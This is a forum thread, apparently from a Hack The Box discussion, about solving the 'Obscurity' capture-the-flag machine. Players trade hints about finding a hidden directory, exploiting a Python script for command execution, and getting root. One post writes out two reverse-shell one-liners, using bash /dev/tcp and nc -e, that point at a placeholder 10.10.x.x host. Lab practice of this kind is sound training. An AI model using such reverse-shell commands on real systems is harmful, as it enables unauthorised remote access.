Obscurity

@djbrains said:

@w4x said:

@djbrains said:

@clubby789, what is the intended way? I got 2 ways now. One gave me the root password and the other only the flag.

The goal isn’t to root the machine ? x)
Rooting or root access? :wink:

Virtualbox?

Excellent box and pretty straightforward :smiley: I found two ways to root it :wink: don’t know which one was the intended but both were fun

@zuk4 said:

Hi All,

I’m new in the hacking world and I have decided to try this machine, but I’m struggling to understand the py script or even run it. I’m not a python person, my mistake it seems.

So I have found the directory and the py script and I need help to understand it, is anyone able to help me?

Thank you

bro, how did you find the secret directory and py file? Can you help me please?

Hi,

I’m stuck with the dir… no way to find it. Can anyone give me a nudge?
I’ve tried all the fuzzing tools but with no luck… also manually with the same result.

So I’ve found the place in the foothold where I can manipulate input to the server to achieve command execution and I’ve written a script that can encode and then execute either system commands or instructions in parseltongue. However, I cannot figure out how to get a reverse shell or even just exfil data. The only way that I know for a fact my commands can be run by the system is by sending a “wget” and setting up a HTTP server on my box and seeing the file request go through. However, if I try to run a
bash -i >& /dev/tcp/10.10.x.x/31337 0>&1 or a
nc -e /bin/bash 10.10.x.x 31337
I get no reverse shell. I’ve reset the box and still no reverse shell, since I’ve seen some people try that. I feel like I’m on the right track, but could use a nudge in the right direction to actually get on the box.

Edit: Got shell, and then after some work got user. Huge thanks to @sChr0D1NGer for solving my reverse shell problems! The hint that worked for me: system commands may not be able to do what you think they can, so stick to native parseltongue.

Edit2: Aaaaand… root! I don’t know if I solved as intended, because I took advantage of my ability to read the code to capture something during execution rather than exploit execution. Could any others with root let me know if I got system as intended?

Cannot find initial footholds…any hint…nothing seems to work

I found the py file and have gone through it for like 2 days, and I cannot find a way to proceed further.

I think it might be possible through the ex** code, but I’m not sure as I’m new to this and cannot proceed, only scratch my head over it.

Can someone help me out through it?

@d4sh1981 said:

Seem to be having a problem with the initial fuzzing, don’t seem to be able to find the directory

Update: I think I have found the command that will find the directory. But it is making no sense. Can someone message me with a nudge on what I am missing? Have ffuf running and it is not returning every line in the file.

I found the .py file, but I have no idea on how to exploit it, any hints or references would be appreciated, cheers!

Well, I’ve got a rough idea on what to exploit for RCE, but still not sure how to do so

Someone please PM for RCE, I think I know where I should serve the payload but nothing I am sending returns anything.

Best I can do is 404 or 400

Good box, once I rooted it I then learnt about 2 other ways to root it.
So I now have a total of 3 ways to root the box.

You can PM via discord if you need help, Discord only, please.

Recently joined HTB, so my first root here. Nice machine, simple and straightforward.

My tips:

  • simulate your RCE payload locally
  • read the code
  • things may disappear quickly, find a way to catch them

Really like this machine and all the python scripts you had to make or edit. PM for nudges.

@TheWick33 said:

@zuk4 said:

Hi All,

I’m new in the hacking world and I have decided to try this machine, but I’m struggling to understand the py script or even run it. I’m not a python person, my mistake it seems.

So I have found the directory and the py script and I need help to understand it, is anyone able to help me?

Thank you

bro, how did you find the secret directory and py file? Can you help me please?

I have used dirb with a wordlist file, that was the easiest part, at least for me.

Should I try to bruteforce the key for user?

@Hagbard70 said:

Should I try to bruteforce the key for user?

This is what I have been trying to do with no luck. I am not good with the logic/math of it to do what other people are saying here.

Any nudges?

For people asking if their method for root was intended: It should follow a similar gist to the rest of the box.

@Hagbard70 said:

Should I try to bruteforce the key for user?

I don’t think it’s an intended way. You would rather focus on “areas” where that key is used.

Found .py file by hand… I just read the webpage… but my python knowledge is lacking here… could somebody give me a nudge? I’m spending way too much time on this step of understanding the py file…